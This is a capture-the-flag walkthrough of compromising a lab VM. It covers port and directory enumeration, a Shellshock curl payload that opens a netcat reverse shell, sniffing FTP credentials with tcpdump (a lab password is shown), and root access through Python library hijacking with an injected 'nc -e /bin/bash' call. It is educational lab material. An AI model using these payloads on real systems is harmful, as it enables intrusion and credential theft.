Enumeration
Nmap
Copy nmap -sC -sV -oA nmap/sym3 192.168.1.114
Copy Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
| 256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_ 256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DA:E2:26 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
Let's put the IP to the browser
And we got this at the inspect elements
So, I decided to use dirb and gobuster
dirb & gobuster
Copy dirb http://192.168.1.114/
Copy
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 26 02:42:28 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.114/gate/
+ http://192.168.1.114/index.html (CODE:200|SIZE:241)
+ http://192.168.1.114/server-status (CODE:403|SIZE:278)
---- Entering directory: http://192.168.1.114/gate/ ----
+ http://192.168.1.114/gate/index.html (CODE:200|SIZE:202)
-----------------
END_TIME: Tue May 26 02:42:38 2020
DOWNLOADED: 9224 - FOUND: 4
We got a directory called gate
Nothing seems to be interesting, so let's continue to enumerate
I can't enumerate anything from dirb so I changed to gobuster
Copy gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Copy ===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.114/gate/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/26 02:44:57 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/05/26 02:45:39 Finished
===============================================================
We got a directory called /cerberus
Further enumeration I got /tartarus and I got this
At the inspect elements, it says it may be misleading
It seems that we might gone into a rabbit hole. So let's back to square one
I use dirbuster to enumerate the URL again
Then, when we enumerate, we got the underworld directory under cgi-bbin
Lets navigate to /cgi-bin/underworld
Got this..hmmm
Exploitation
Reverse Shell
We can get a reverse shell by using this command
Copy curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld And we need to set up a listener at out machine
Got a reverse shell. Then we can type the python code to spawn a proper shell
Copy python -c 'import pty; pty.spawn("/bin/bash")' After that I use tcpdump to grab the ftp server network and store it at /tmp directory.
Copy tcpdump -w ftplog.pcap -i lo Then we can use nc to transfer the file to our machine to analyse it
After that we can use wireshark to analyse it.
We can filter it by tcp.port == 21 and then we right click and choose follow TCP stream and then we can see this
We got the password (PTpZTfU4vxgzvRBE) and username for user hades
We can su to the user hades
Privilege Escalation
After that we run the pspy again
Then we got this
We know that there is a file running at /opt/ftpclient that can run as root.
But when we go to the /opt/ftpclient we can see that we have no permission to edit the files.
Python Library Hijacking
After researching and asking the author of this machine cause I didn't know how it works, it is python library hijacking.
Copy python -c 'import sys; print "\n".join(sys.path)' Using this command will show the path that all the directories that python will look for to import the library according to the directories.
As we can see here there are bunch of folders
If we cat into the ftpclient.py that is under /opt/ftpclient, we can see that the file is importing a library called ftplib
We navigate to /usr/lib/python2.7
Then we can type ls -la | grep ftplib
We can see that ftplib.py can be modify by the user that is under group gods which can be edited by hades.
We first rename the file to become a backup file
Then we can nano ftplib.py to create a new file to replace the old one.
Type in these code to get a reverse shell
Copy import os
import sys
os.system("nc -e /bin/bash 192.168.1.116 4444") Then save the file.
Go to our machine to set up a listener
After waiting for 1 minute, we get a reverse shell back
Then type the python code to get a proper shell
Then, we got root !
Navigate to /root to get the flag.txt
Congratulation !
